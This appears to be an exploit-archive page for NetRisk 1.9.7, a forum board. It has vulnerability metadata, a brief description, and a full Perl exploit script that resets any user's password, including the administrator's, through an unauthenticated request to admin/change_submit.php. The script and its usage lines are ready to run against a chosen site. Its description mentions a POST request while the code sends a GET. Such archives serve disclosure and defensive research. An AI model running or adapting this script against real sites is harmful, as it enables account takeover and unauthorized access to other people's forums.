header-logo
Suggest Exploit
vendor:
NetRisk
by:
Cod3rZ
9.3
CVSS
HIGH
Remote Password Change
287
CWE
Product Name: NetRisk
Affected Version From: 1.9.2007
Affected Version To: 1.9.2007
Patch Exists: YES
Related CWE: N/A
CPE: a:netrisk:netrisk:1.9.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

NetRisk 1.9.7 Remote Password Change Exploit

This exploit allows an attacker to change the password of any user on the NetRisk 1.9.7 board. The vulnerability is due to a lack of authentication when changing the password. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request to the board. This will allow the attacker to change the password of any user on the board.

Mitigation:

Upgrade to the latest version of NetRisk.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#=========================================================================================================================#
#                               _ ____             _        _ _                _                                          #
#                    __ ___  __| |__ /_ _ ___     | |_  ___| | |_____ __ _____| |__       ___ _  _                        #
#                   / _/ _ \/ _` ||_ \ '_|_ /  _  | ' \/ -_) | / _ \ V  V / -_) '_ \  _  / -_) || |                       #
#                   \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_|                       #
#=========================================================================================================================#
# Author: Cod3rZ                                                                                                          #
# Site: http://cod3rz.helloweb.eu                                                                                         #
#=========================================================================================================================#
# Status: Public                                                                                                          #
#=========================================================================================================================#
# Board: NetRisk 1.9.7                                                                                                    #
# Download: http://phprisk.org/netrisk_1.9.7.zip                                                                          #
#=========================================================================================================================#
# Vuln Type: Remote Password Change [Exploit]                                                                             #
# Severity:  Highest                                                                                                      #
#=========================================================================================================================#
# The ACP haven't control and we can change the password of the other users                                               #
#=========================================================================================================================#
# http://[site]/admin/change_submit.php?username=[user]&new_pass=[newpass]                                                #
#=========================================================================================================================#
# NetRisk contains a lot of bugs: RFI, SQL Injection, ecc; but this is the highest vuln and i wouldn't post those         #
#=========================================================================================================================#
use LWP::UserAgent;
use HTTP::Request::Common;
$lwp = new LWP::UserAgent;
system('cls');
$site = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
print q{ ---------------------------------------------------------------------
           :: NetRisk 1.9.7 Remote Password Change Exploit ::
 ---------------------------------------------------------------------
 Author : Cod3rZ
 Email  : songforthemoment@yahoo.it
 Site   : http://cod3rz.helloweb.eu
 ---------------------------------------------------------------------};
if(!$site || !$user || !$pass)
{
print q{ 
 Usage: perl netrisk.pl [site] [user] [newpass]
 Usage: perl netrisk.pl site.com/netrisk admin 123456
 ---------------------------------------------------------------------};
system('exit');
} 
else {
print "
 Site: $site
 User: $user
 Pass: $pass
 ---------------------------------------------------------------------
 Waiting...
 ---------------------------------------------------------------------";
$connect = $lwp->request(GET $site."/admin/change_submit.php?username=".$user."&new_pass=".$pass);
$content = $connect->content;
if($content =~ /username->/) {
 print "
 Password Changed 
 ---------------------------------------------------------------------"; }
 else { print "
 Error
 ---------------------------------------------------------------------"; }
}
# http://cod3rz.helloweb.eu

# milw0rm.com [2008-01-05]

Navigation

Suggest Exploit

Services By CQR